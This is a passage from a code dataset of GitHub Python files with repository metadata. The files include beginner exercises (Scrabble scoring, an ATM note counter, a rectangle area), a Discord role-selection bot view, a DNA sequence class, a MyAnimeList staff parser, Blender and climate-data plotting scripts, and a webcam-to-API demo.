15.\nprint(brownie_points)\n\n# ====================\n# Score a Game Section\n# ====================\n# Task 9: Create dictionary\nplayer_to_words ={\n \"player1\": [\"BLUE\", \"TENNIS\", \"EXIT\"],\n \"wordNerd\": [\"EARTH\", \"EYES\", \"MACHINE\"],\n \"Lexi Con\": [\"ERASER\", \"BELLY\", \"HUSKY\"],\n \"Prof Reader\": [\"ZAP\", \"COMA\", \"PERIOD\"]\n}\n\n# Task 10: Create empty dictionary\nplayer_to_points = {}\n\n# Task 11: Iterate through items in player_to_words. Create player_points and set to 0.\nfor player, words in player_to_words.items():\n # Create variable\n player_points = 0\n # Task 12: Iterate through words and add value of word using score_word\n for word in words:\n # Add value of word to player_points\n player_points += score_word(word)\n # Task 13: Add key value pair to player_points using player and player_points\n player_to_points[player] = player_points\n# Task 14: Print player_to_points. wordNerd should be winning by 1 point.\nprint(player_to_points)\n\n# ===================================\n# Ideas for Further Practice! Section\n# ===================================\n# Task 15: Extra Functions\n# - update_point_totals: Nested loop from Task 11 to Task 13 to be called when a word is played\n# - play_word: Takes a player and word and adds word to player's list of words\n# Able to score lowercase inputs as well - Code is labeled as Task 15: Extra above.\n# Write update_point_totals function\ndef update_point_totals():\n # Iterate through player_to_words\n for player, words in player_to_words.items():\n # Create variable\n player_points = 0\n # Iterate through words\n for word in words:\n # Add value of word to player_points\n player_points += score_word(word)\n # Add key value pair to player_points using player and player_points\n player_to_points[player] = player_points\n\n# Write play_word function\ndef play_word(player, word):\n # Append word to players list of words\n player_to_words.get(player).append(word)\n # Call update_point_totals\n update_point_totals()\n # Print player_to_points\n print(player_to_points)\n\n# Test play_word function\nplay_word(\"player1\", \"COOKIE\")\n# Test play_word function\nplay_word(\"wordNerd\", \"Water\")\n","repo_name":"josejpalacios/codecademy-python3","sub_path":"Lesson 08: Dictionaries/Project 01: Scrabble.py","file_name":"Project 01: Scrabble.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74529049651","text":"# saque = int(input('Que valor você quer sacar? R$')) #1234\n#\n# cinquenta = saque // 50 #24\n# diferenca1 = cinquenta * 50 #1200\n#\n# vinte = (saque - diferenca1) // 20 #1\n# diferenca2 = vinte * 20 #20\n#\n# dez = (saque - (diferenca1 + diferenca2)) // 10 #1\n# diferenca3 = dez * 10 #10\n#\n# um = (saque - (diferenca1 + diferenca2 + diferenca3)) // 1 #4\n#\n# print(f'Total de {cinquenta} cédulas de R$50')\n# print(f'Total de {vinte} cédulas de R$20')\n# print(f'Total de {dez} cédulas de R$10')\n# print(f'Total de {um} cédulas de R$1')\n\n\n'''GUANABARA'''\n# Verifica o mantante do dinheiro que é o 'total', vai tirando notas 50 reais até não dar mais,\n# verifica o quanto sobrou e vai tirando notas de 20 até não dar mais,\n# Verifica o quanto sobrou e vai tirando notas de 10 reais e por ultimo,\n# verifica a quanto sobrou e vai tirando notas de 1 real.\nprint('=' * 30)\nprint('{:^30}'.format('BANCO CEV'))\nprint('=' * 30)\nvalor = int(input('Que valor você quer sacar? R$'))\ntotal = valor\ncéd = 50\ntotcéd = 0\nwhile True:\n if total >= céd:\n total -= céd\n totcéd += 1\n else:\n if totcéd > 0:\n print(f'Total de {totcéd} cédulas de R${céd}')\n if céd == 50:\n céd = 20\n elif céd == 20:\n céd = 10\n elif céd == 10:\n céd = 1\n totcéd = 0\n if total == 0:\n break\nprint('=' * 30)\nprint('Volta sempre ao BANCO CEV! Tenha um bom dia!')\n\n","repo_name":"JaymersonFerreira/python-guanabara","sub_path":"exercicios/ex071.py","file_name":"ex071.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12283430785","text":"import os\nfrom dotenv import load_dotenv\n\nimport cv2\n\nimport pynput\nfrom pynput import keyboard\nimport base64\nimport requests\nimport json\n\nload_dotenv()\n\n\ndef on_release(key):\n if 'char' in dir(key):\n if key.char == \"p\":\n print(\"\\nphoto\")\n\n # Activation de la caméra\n cam = cv2.VideoCapture(0)\n ret, img = cam.read()\n\n if ret:\n # scale_percent = 60 # percent of original size\n # width = int(img.shape[1] * scale_percent / 100)\n # height = int(img.shape[0] * scale_percent / 100)\n # dim = (width, height)\n\n # resized = cv2.resize(img, dim, interpolation=cv2.INTER_AREA)\n\n # cv2.imshow(\"test\", resized)\n # cv2.waitKey()\n # cv2.destroyAllWindows()\n\n # Transformer l'image en base 64\n retval, buffer = cv2.imencode('.jpg', img)\n jpg_as_text = base64.b64encode(buffer).decode('utf-8')\n dataurl = f'data:image/jpg;base64,{jpg_as_text}'\n\n # Requète vers l'API\n # Laisser vide la question si juste description automatique de l'image\n question = \"Is the person giving a thumbs up or down? answer:\"\n\n resp = requests.post(\n os.getenv('DOMAIN'),\n json={\"image\": dataurl,\n \"visualQuestion\": question},\n headers={\"Content-Type\": \"application/json\"})\n answer = resp.json()\n\n output = answer[\"prediction\"][\"output\"]\n print(output)\n\n cam.release()\n\n\n# Evenements du clavier\nwith keyboard.Listener(\n # on_press=on_press,\n on_release=on_release) as listener:\n listener.join()\n","repo_name":"mmattm/camera-obscura-python","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2602572617","text":"from typing import List\n\nimport discord\nfrom discord import Interaction\n\nfrom main.constants import roles_categories, fluency_levels, misc_roles, pronoun_roles\nfrom main.views.view_components.buttons import FluencyLevelButton, MiscRoleButton, PageChangeButton, PronounRoleButton\nfrom main.views.view_components.dropdowns import RolesCategoryDropdown, NativeLanguagesDropdown\n\n# Creates subclass for viewing the role buttons\nclass RolesView(discord.ui.View):\n\n # Creates buttons and dropdown menus for the /roles command\n def __init__(self):\n super().__init__()\n self.nativelanguages_dropdown = None\n self.pagechange_buttons: List[PageChangeButton] = []\n dropdown = RolesCategoryDropdown(self.on_rolescategory_dropdown_select)\n self.add_item(dropdown)\n\n def fluency_level_buttons(self):\n buttons = []\n for fluency_level in fluency_levels:\n button = FluencyLevelButton(fluency_level, self.on_fluencylevel_button_click)\n buttons.append(button)\n return buttons\n\n def misc_role_buttons(self):\n buttons = []\n for misc_role in misc_roles:\n button = MiscRoleButton(misc_role, self.on_miscrole_button_click)\n buttons.append(button)\n return buttons\n \n def pronoun_role_buttons(self):\n buttons = []\n for pronoun_role in pronoun_roles:\n button = PronounRoleButton(pronoun_role, self.on_pronoun_button_click)\n buttons.append(button)\n return buttons\n\n def page_change_buttons(self):\n return [\n PageChangeButton(PageChangeButton.PageChangeButtonType.prev_page, self.on_pagechange_button_click),\n PageChangeButton(PageChangeButton.PageChangeButtonType.next_page, self.on_pagechange_button_click)\n ]\n\n # Code to be executed when choosing a category on the role category dropdown menu\n async def on_rolescategory_dropdown_select(self, dropdown: RolesCategoryDropdown, interaction: Interaction):\n self.clear_items()\n selection = dropdown.values[0]\n # Displays respective menu depending on the role category chosen\n if selection == roles_categories[0].code:\n buttons = self.fluency_level_buttons()\n for button in buttons:\n self.add_item(button)\n await interaction.response.edit_message(content=\"What is your fluency level in English? If you aren't sure, choose Intermediate.\", view=self)\n elif selection == roles_categories[1].code:\n self.nativelanguages_dropdown = NativeLanguagesDropdown(self.on_nativelanguages_dropdown_select)\n self.add_item(self.nativelanguages_dropdown)\n for button in self.page_change_buttons():\n self.pagechange_buttons.append(button)\n self.add_item(button)\n await interaction.response.edit_message(content=\"Select your native language...\", view=self)\n elif selection == roles_categories[2].code:\n buttons = self.misc_role_buttons()\n for button in buttons:\n self.add_item(button)\n await interaction.response.edit_message(content=\"Select other roles...\", view=self)\n elif selection == roles_categories[3].code:\n buttons = self.pronoun_role_buttons()\n for button in buttons:\n self.add_item(button)\n await interaction.response.edit_message(content=\"Select pronoun roles...\", view=self)\n \n # Code to be executed when choosing a native language on the native language dropdown menu\n async def on_nativelanguages_dropdown_select(self, dropdown: NativeLanguagesDropdown, interaction: Interaction):\n self.clear_items()\n for value in dropdown.values:\n role = interaction.guild.get_role(int(value))\n await interaction.user.add_roles(role)\n\n await interaction.response.edit_message(content=\"Role added! You can now dismiss this message.\", view=self)\n \n # Code to be executed when choosing a role on the misc role menu\n async def on_miscrole_button_click(self, button: MiscRoleButton, interaction: Interaction):\n self.clear_items()\n interaction_user = interaction.user\n requested_role = interaction.guild.get_role(button.role_id)\n user_has_requested_role = interaction_user.get_role(requested_role.id) is not None\n if user_has_requested_role:\n await interaction_user.remove_roles(requested_role)\n await interaction.response.edit_message(content=\"Role removed! You can now dismiss this message.\", view=self)\n else:\n await interaction_user.add_roles(requested_role)\n await interaction.response.edit_message(content=\"Role added! You can now dismiss this message.\", view=self)\n \n # Code to be executed when choosing a role on the pronoun role menu \n async def on_pronoun_button_click(self, button: MiscRoleButton, interaction: Interaction):\n self.clear_items()\n interaction_user = interaction.user\n requested_role = interaction.guild.get_role(button.role_id)\n user_has_requested_role = interaction_user.get_role(requested_role.id) is not None\n if user_has_requested_role:\n await interaction_user.remove_roles(requested_role)\n await interaction.response.edit_message(content=\"Role removed! You can now dismiss this message.\", view=self)\n else:\n await interaction_user.add_roles(requested_role)\n await interaction.response.edit_message(content=\"Role added! You can now dismiss this message.\", view=self)\n \n # Code to be executed when choosing a role on the fluency level menu \n async def on_fluencylevel_button_click(self, button: FluencyLevelButton, interaction: Interaction):\n self.clear_items()\n interaction_user = interaction.user\n requested_role = interaction.guild.get_role(button.role_id)\n user_has_requested_role = interaction_user.get_role(requested_role.id) is not None\n\n # Clears any previously assigned fluency level roles from the user \n # This prevents them having two fluency level roles\n async def clear_roles():\n await interaction_user.remove_roles(\n discord.Object(fluency_levels[0].role_id),\n discord.Object(fluency_levels[1].role_id),\n discord.Object(fluency_levels[2].role_id),\n discord.Object(fluency_levels[3].role_id)\n )\n\n await clear_roles()\n # Assigns requested role to the user and sends a confirmation message\n if user_has_requested_role:\n await interaction.response.edit_message(content=\"Role removed! You can now dismiss this message.\", view=self)\n else:\n await interaction_user.add_roles(requested_role)\n await interaction.response.edit_message(content=\"Role added! You can now dismiss this message.\", view=self)\n\n # Code to be executed when a page change button is clicked\n # Goes to the next or previous page\n async def on_pagechange_button_click(self, button: PageChangeButton, interaction: Interaction):\n if button.label == \"Next Page\":\n self.nativelanguages_dropdown.next_page()\n elif button.label == \"Prev Page\":\n self.nativelanguages_dropdown.prev_page()\n # Displays the next or previous page\n self.refresh_page_change_buttons(self.nativelanguages_dropdown.slice_start, self.nativelanguages_dropdown.slice_end)\n await interaction.response.edit_message(content=\"Select your native language...\", view=self)\n \n # Refreshes the menu depending on the page selected\n def refresh_page_change_buttons(self, slice_start: int, slice_end: int):\n for button in self.pagechange_buttons:\n button.refresh(slice_start, slice_end)\n","repo_name":"sbeve72/rel-bot","sub_path":"main/views/roles_view/roles_view.py","file_name":"roles_view.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"40250666677","text":"width = 15\nuserWidth = 5\n\nmessages = [[1, \"Hello how r u\"], [2, \"good ty\"], [2, \"u\"], [1, \"me too bro\"]]\n# messages = [[1, \"Hello how r u\"], [2, \"good ty\"], [2, \"u here me\"], [1, \"me too bro\"]]\n\nclosers = \"+\" + \"*\"*width + \"+\"\nborder = \"|\"\ndef solve(message):\n side, msg = message\n result = []\n words = msg.split()\n row = [words[0]]\n curr = len(words[0])\n for idx, word in enumerate(words[1:]):\n if curr + len(word) + 1 <= userWidth:\n row.append(word)\n curr += len(word) + 1\n else:\n if side == 1:\n aft = \" \" * (width-curr+1)\n row.append(aft)\n else:\n bef = \" \" * (width-curr+1)\n row = [bef] + row\n x = \" \".join(row)\n result.append(\"|\"+x+\"|\")\n curr = len(word)\n row = [word]\n\n if side == 1:\n aft = \" \" * (width-curr+1)\n row.append(aft)\n else:\n bef = \" \" * (width-curr+1)\n row = [bef] + row\n x = \" \".join(row)\n result.append(\"|\"+x+\"|\")\n return result\n\nans = []\nans.append(closers)\nfor item in messages:\n n = solve(item)\n if not n: continue\n for el in n:\n ans.append(el)\nans.append(closers)\nfor r in ans:\n print(r)\n\n['+***************+', \n'|Hello |', \n'|how r |', \n'|u |', \n'| good|', \n'| ty|', \n'| u|', \n'|me |', \n'|too |', \n'|bro |', \n'+***************+']\n\n['+***************+', \n'|Hello |', \n'|how r |', \n'|u |', \n'| good|', \n'| ty|', \n'| u|', \n'| here|', \n'| me|', \n'|me |', \n'|too |', \n'|bro |', \n'+***************+']","repo_name":"Naboni/Competitive-Programming","sub_path":"OA/oa10.py","file_name":"oa10.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29685398471","text":"#! /usr/bin/env python3\n\nclass Sequence:\n # Detect the type of sequence this is\n def detect_type(seq):\n # Check to see if this seq is only ACGT\n count = seq.count(\"A\") + seq.count(\"C\") + seq.count(\"G\") + seq.count(\"T\")\n\n return \"N\" if count == len(seq) else \"P\"\n\n def get_aa():\n # Obtained from https://stackoverflow.com/questions/19521905/translation-dna-to-protein\n return {\n 'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n 'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n 'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n 'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n 'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n 'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n 'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n 'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n 'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n 'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n 'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n 'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n 'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n 'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n 'TAC':'Y', 'TAT':'Y', 'TAA':'*', 'TAG':'*',\n 'TGC':'C', 'TGT':'C', 'TGA':'*', 'TGG':'W',\n }\n\n # Perform the reverse complement on a nucleotide sequence\n def rev_comp(seq):\n ret_seq = \"\"\n rev_lookup = {'A':'T', 'C':'G', 'G':'C', 'T':'A'}\n\n for nuc in seq[::-1]:\n ret_seq += rev_lookup.get(nuc, '')\n\n return ret_seq\n\n # Translate the sequence on the specified frame\n def translate_frame(seq, frame):\n ret_protein = \"\"\n aa_lookup = Sequence.get_aa()\n\n # Frames 0-2 fwd, 3-5 rev\n strand = seq if frame < 3 else Sequence.rev_comp(seq)\n\n # Start on the requested frame, and skip a codons length each time\n for pos in range(frame % 3, len(strand), 3):\n codon = strand[pos:pos+3]\n\n if codon not in aa_lookup:\n ret_protein += \"X\"\n else:\n ret_protein += aa_lookup[codon]\n\n return ret_protein\n\n def __init__(self, seq = '', molecule = 'N'):\n # Set sequence (no override necessary)\n self.seq = seq\n self.molecule = molecule\n\n # Perform a type check if nucleotide\n if self.molecule == 'N':\n self.molecule = Sequence.detect_type(self.seq)\n\n # String method returns format \":\"\n def __str__(self):\n return \"{0}:{1}\".format(self.molecule, self.seq)\n\n # Len should return length of sequence\n def __len__(self):\n return len(self.seq)\n\n # Equality checks for same sequence (or translated sequence for N==P)\n def __eq__(self, operand):\n # If not a sequence, return false\n if not isinstance(operand, Sequence):\n return False\n\n if self.molecule == operand.molecule:\n # If the same type, simply compare strings\n return self.seq == operand.seq\n else:\n # If different types, compare translations\n for trans1 in self.translate():\n for trans2 in operand.translate():\n if trans1 == trans2:\n return True\n\n return False\n\n # Addition should create a new sequence that's the concatenation of two\n # sequences of same type, or an empty nucleotide sequence if not\n def __add__(self, operand):\n # If not a sequence, return new empty sequence\n if not isinstance(operand, Sequence):\n return Sequence()\n\n # If not same type, return new empty sequence\n if self.molecule != operand.molecule:\n return Sequence()\n\n # Return concatenation of same type\n return Sequence(self.seq + operand.seq, self.molecule)\n\n # If nucleotides, translate on all 6 frames. If prot, return\n def translate(self):\n ret_list = []\n\n if self.molecule == 'P':\n # For proteins, simply return sequence\n ret_list.append(self.seq)\n else:\n # For nucleotides, translate all 6 frames and add to list\n for frame in range(6):\n ret_list.append(Sequence.translate_frame(self.seq, frame))\n\n return ret_list\n\n # Calculate GC content\n def gc_content(self):\n # For proteins, return 0\n if self.molecule == 'P':\n return 0\n\n return (self.seq.count(\"C\") + self.seq.count(\"G\")) / len(self)\n\n# Prompt the user for a list of nucleotide sequences\ndef get_seqs():\n seq_list = []\n\n while True:\n seq = input(\"Enter nucleotide seq: \")\n if seq == \"\":\n break\n\n seq_list.append(Sequence(seq))\n\n return seq_list\n\n# Count kmers across all Sequence instances in the list\ndef get_kmers(seqs, size):\n kmers = {}\n\n for seq in seqs:\n # Skip protein sequences\n if seq.molecule == 'P': continue\n\n # Iterate through the starting position of each kmer and record\n for pos in range(len(seq) - size + 1):\n kmer = seq.seq[pos:pos+size]\n kmers.setdefault(kmer, 0)\n kmers[kmer] += 1\n\n return kmers\n\n# Get seqs, and print 3mers, 4mers and 5mers\nseqs = get_seqs()\n\nprint(get_kmers(seqs, 3))\nprint(get_kmers(seqs, 4))\nprint(get_kmers(seqs, 5))\n","repo_name":"hillba88/Bioinformatic-Programming","sub_path":"hw5-5.py","file_name":"hw5-5.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73365796854","text":"import datetime\nimport re\nfrom io import BytesIO\nfrom typing import TypedDict\n\nfrom dateutil import parser\nfrom selectolax.parser import HTMLParser\n\nfrom shinobi.decorators.return_error_decorator import return_on_error\nfrom shinobi.utilities.regex import RegexHelper\nfrom shinobi.utilities.string import StringHelper\n\n\nclass StaffImageDictionary(TypedDict):\n image: BytesIO\n mimetype: str\n\n\nclass StaffDictionary(TypedDict):\n mal_id: str\n name: str\n staff_image: StaffImageDictionary\n given_name: str\n family_name: str\n alternate_name: list[str]\n birthday: datetime.datetime\n about: str\n\n\nclass StaffParser:\n def __init__(self, html: str):\n self.parser = self.get_parser(html)\n\n # Facades\n self.regex_helper = RegexHelper()\n self.string_helper = StringHelper()\n\n @staticmethod\n def get_parser(html) -> HTMLParser:\n return HTMLParser(html)\n\n @property\n @return_on_error(\"\")\n def get_staff_url(self) -> str:\n return self.parser.css_first(\"meta[property='og:url']\").attributes[\"content\"]\n\n @property\n @return_on_error(\"\")\n def get_staff_id(self) -> str:\n return self.regex_helper.get_id_from_url(self.get_staff_url)\n\n @property\n @return_on_error({})\n def get_staff_image(self) -> StaffImageDictionary:\n url = self.parser.css_first(\"meta[property='og:image']\").attributes[\"content\"]\n if url:\n res = self.client.get(url)\n return {\n \"image\": BytesIO(res.content),\n \"mimetype\": url.split(\".\")[-1],\n }\n\n @property\n @return_on_error(\"\")\n def get_staff_name(self) -> str:\n return self.parser.css_first(\"meta[property='og:title']\").attributes[\"content\"]\n\n @property\n @return_on_error(\"\")\n def get_staff_about(self) -> str:\n return self.parser.css_first(\n \"div#content table tr td.borderClass .people-informantion-more\"\n ).text()\n\n @property\n @return_on_error(\"\")\n def get_staff_family_name(self) -> str:\n node = self.parser.css_first(\"#content table tr td.borderClass\")\n matches = node.select(\"span\").text_contains(\"Family name:\").matches\n if len(matches) > 1:\n raise ValueError(\"There are more than one node in family name node\")\n\n # MAL screwed up the HTML here\n html_match = re.search(\n r\"Family name:(.*?)(Alternate names|Birthday|Website|Member Favorites|More)\",\n matches[0].parent.text(),\n )\n family_name = self.string_helper.cleanse(html_match.group(1))\n # MyAnimeList has it Empty in places\n # raise AttributeError so we can return None\n if not family_name:\n raise AttributeError(\"Can't find family name using regex\")\n\n return family_name\n\n @property\n @return_on_error(\"\")\n def get_staff_given_name(self) -> str:\n node = self.parser.select(\"span\").text_contains(\"Given name:\").matches\n if len(node) > 1:\n raise ValueError(\"There are more than one node in given name node\")\n\n given_name = self.string_helper.cleanse(node[0].next.text())\n if not given_name:\n raise AttributeError(\"Can't find given name\")\n\n return given_name\n\n @property\n @return_on_error([])\n def get_staff_alternate_name(self) -> str:\n node = self.parser.css_first(\"div#content table tr td.borderClass\")\n matches = node.select(\"div span\").text_contains(\"Alternate names:\").matches\n\n if len(matches) > 1:\n raise ValueError(\"There are more than one node in alternate name node\")\n\n names = matches[0].next.text().split(\",\")\n alternate_name = [self.string_helper.cleanse(name) for name in names]\n\n return alternate_name\n\n @property\n @return_on_error(\"\")\n def get_staff_birthday(self) -> str:\n node = self.parser.css_first(\"div#content table tr td.borderClass\")\n matches = node.select(\"div span\").text_contains(\"Birthday:\").matches\n if len(matches) > 1:\n raise ValueError(\"There are more than one node in birthday node\")\n\n birthday = parser.parse(self.string_helper.cleanse(matches[0].next.text()))\n return birthday\n\n def build_dictionary(self) -> StaffDictionary:\n dictionary: StaffDictionary = {\n \"mal_id\": self.get_staff_id,\n \"name\": self.get_staff_name,\n \"given_name\": self.get_staff_given_name,\n \"family_name\": self.get_staff_family_name,\n \"alternate_name\": self.get_staff_alternate_name,\n \"birthday\": self.get_staff_birthday,\n \"about\": self.get_staff_about,\n \"staff_image\": self.get_staff_image,\n }\n return dictionary\n","repo_name":"baseplate-admin/CoreProject","sub_path":"backend/shinobi/parser/staff.py","file_name":"staff.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"21"} +{"seq_id":"36474595321","text":"from Enums import SNR\nfrom create_data import create_data\nfrom evaluation import calculate_hter, plot_confusion_matrix, predict, average_of_neighbors\nfrom model import create_rgb_model\nfrom train import train\n\nif __name__ == '__main__':\n path_data = './QUT-NOISE-TIMIT/'\n snr = SNR.FIVE\n path_save = \"./rgb_spectrograms/\"\n x_train, y_train, x_test, y_test, frames, frames_test = create_data(path_data, path_save, snr, recreate=False)\n\n model = create_rgb_model()\n model = train(model, x_train, y_train, epochs=5)\n\n # Evaluate\n predictions = predict(model, x_test)\n cf_matrix = plot_confusion_matrix(predictions, y_test, percentage=False)\n\n hter, mr, far = calculate_hter(cf_matrix)\n\n print(f'The HTER is {hter}% for SNR {snr.value}, with MR being {mr} and FAR being {far}')\n\n # Post-processing\n predictions_post_processing = average_of_neighbors(predictions, 5)\n cf_matrix = plot_confusion_matrix(predictions_post_processing, y_test, percentage=False)\n\n hter, mr, far = calculate_hter(cf_matrix)\n\n print(f'The post-processed HTER is {hter}% for SNR {snr.value}, with MR being {mr} and FAR being {far}')\n","repo_name":"nadbot/Exploring-Convolutional-Neural-Networks-for-Voice-Activity-Detection","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72905130293","text":"print(\"Area of rectangle [Calculator]\\n\")\n#asks the user what the width of the rectangle is. (float)\nwidth = float(input(\"Width: \"))\n#asks the user what the height of the rectangle is. (float)\nheight = float(input(\"Height: \"))\n#calculates area\nsum = (width * height)\n#prints the calculated answer in 2 decimal places\nprint(\"\\nArea of Rectangle:\", round(sum, 2))\n#makes sure the user clicks enter before the \"console\" closes. this allows them to see the answer instead of the console closing instantly\ninput()","repo_name":"JacProsser/college","sub_path":"Assignment 1 - Procedural Programming/Python Challenges (1-30)/Challenge 3.py","file_name":"Challenge 3.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1125838029","text":"import bpy\nimport bmesh\n\n#define function that will deselect every other vert from all verts selected\ndef checkered_deselect(obj, bm):\n selected_verts = [v for v in bm.verts if v.select]\n for i, vert in enumerate(selected_verts):\n if i % 2 == 1:\n vert.select = False\n bm.select_flush(False)\n\nobj = bpy.context.object\nif obj and obj.type == 'MESH':\n bpy.ops.object.mode_set(mode='EDIT')\n bm = bmesh.from_edit_mesh(obj.data)\n checkered_deselect(obj, bm)\n bmesh.update_edit_mesh(obj.data)\nelse:\n print(\"Please select a mesh object.\")\n\n#space out the verts (requires looptools addon)\nbpy.ops.mesh.looptools_space(influence=100, input='selected', interpolation='cubic', lock_x=False, lock_y=False, lock_z=False)\n","repo_name":"LeoFdAguiar/LFdA-Blender-Scripts","sub_path":"checkered-deselect-islands.py","file_name":"checkered-deselect-islands.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28008027534","text":"from scipy.io import netcdf\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport os\nimport xarray as xr\nfrom sif_utils import plot_histogram\n\nDATA_DIR = \"/mnt/beegfs/bulk/mirror/jyf6/datasets\"\nFILE_PATH = os.path.join(DATA_DIR, 'FLDAS/FLDAS_NOAH01_C_GL_M.A201808.001.nc.SUB.nc4')\nSTART_DATE = '2018-08-01'\nEND_DATE = '2018-08-16'\nPLOT_FOLDER = './exploratory_plots/FLDAS'\n\nif not os.path.exists(PLOT_FOLDER):\n os.makedirs(PLOT_FOLDER)\n\n\ndataset = xr.open_dataset(FILE_PATH)\n\n# Variables: Rainf_f_tavg, Rainf_f_tavg, Rainf_f_tavg\nprint(\"======================================================\")\nprint(\"Dataset variables:\", dataset)\nprint(\"======================================================\")\n\n# Plot the distribution of temperature (across all time/space)\n# all_rainfall = dataset.Rainf_f_tavg.values.flatten()\n# all_rainfall = all_rainfall[~np.isnan(all_rainfall)]\n# n, bins, patches = plt.hist(all_rainfall, 100, facecolor='blue', alpha=0.5)\n# plt.title('Temp values: August 1-16, 2018')\n# plt.xlabel('Temp')\n# plt.ylabel('Number of pixels')\n\n# plt.savefig(os.path.join(PLOT_FOLDER, 'all_temp.png'))\n# plt.close()\n\n# data_array = dataset.dcSIF.sel(time=START_DATE)\n# # bfill('time', 10)\n# # SIF should never be negative, so replace any negatives or NaN with 0\n# data_array = data_array.fillna(0)\n# data_array = data_array.where(data_array >= 0, 0)\n# print(data_array)\n\n\n# Select date range\ndata_array = dataset.Rainf_f_tavg.sel(time=slice(START_DATE, END_DATE)).mean(dim='time')\nprint(\"Temp array shape\", data_array.shape)\nprint(\"Array\", data_array)\n\n# Interpolate to higher resolution\nnew_lat = np.linspace(38, 48.7, 1000)\nnew_lon = np.linspace(-108, -82, 1000)\nreprojected_fldas_dataset = dataset.interp(X=new_lon, Y=new_lat).mean(dim='time')\ninterpolated_temps = reprojected_fldas_dataset.Rainf_f_tavg\n\n# Compute the min/max values for plotting\ninterpolated_values = interpolated_temps.values.flatten()\ninterpolated_values = interpolated_values[~np.isnan(interpolated_values)]\nplot_histogram(interpolated_values, \"FLDAS/Rainf_f_tavg_region_histogram.png\", title=\"Rainf_f_tavg\")\nmin_value = np.min(interpolated_values)\nmax_value = np.max(interpolated_values)\n\n# Plot uninterpolated data\nplt.figure(figsize=(21,9))\ncolor_map = plt.get_cmap('Blues')\nax = plt.axes(projection=ccrs.PlateCarree())\nax.set_global()\ndata_array.plot.pcolormesh(ax=ax, transform=ccrs.PlateCarree(), x='X', y='Y', vmin=min_value,\n vmax=max_value, cmap=color_map)\nax.coastlines()\nplt.title('Rainf_f_tavg, average from ' + START_DATE + ' to ' + END_DATE)\nplt.savefig(os.path.join(PLOT_FOLDER, 'Rainf_f_tavg_' + START_DATE + '_to_' + END_DATE + '_global.png'))\nplt.close()\n\n# Plot interpolated data\nplt.figure(figsize=(21,9))\nax = plt.axes(projection=ccrs.PlateCarree())\nax.set_global()\ninterpolated_temps.plot.pcolormesh(ax=ax, transform=ccrs.PlateCarree(), x='X', y='Y', vmin=min_value,\n vmax=max_value, cmap=color_map)\nax.coastlines()\nplt.title('(INTERPOLATED) Rainf_f_tavg, average from ' + START_DATE + ' to ' + END_DATE)\nplt.savefig(os.path.join(PLOT_FOLDER, 'Rainf_f_tavg_INTERPOLATED_' + START_DATE + '_to_' + END_DATE + '_global.png'))\nplt.close()\n\n\n\n\n# Example: get value at specific lat/long\nprint(\"Value at 100W, 45N:\", data_array.sel(Y=40.95, X=-100.15, method='nearest'))\n","repo_name":"joshuafan/Vegetation_SIF_Downscaling_CSSUNet","sub_path":"old_files_2/process_fldas_files.py","file_name":"process_fldas_files.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33350007167","text":"import cv2\n\ngst_str_rtp = \"appsrc ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000\"\nfourcc = cv2.VideoWriter_fourcc(*'H264')\nmanda = \"sout=#rtp{dst=127.0.0.1,port=5000,mux=ts}\"\nHOST = '127.0.0.1'\nPORT = 5000\nfps = 30.\nframe_width = 1280\nframe_height = 720\nprint(cv2.getBuildInformation())\n\nclass Streamto(object):\n def __init__(self):\n # Using OpenCV to capture from device 0. If you have trouble capturing\n # from a webcam, comment the line below out and use a video file\n # instead.\n self.video = cv2.VideoWriter(gst_str_rtp, 0, fps, (frame_width, frame_height), True)\n\n def __del__(self):\n self.video.release()\n\n def send(self, frame):\n 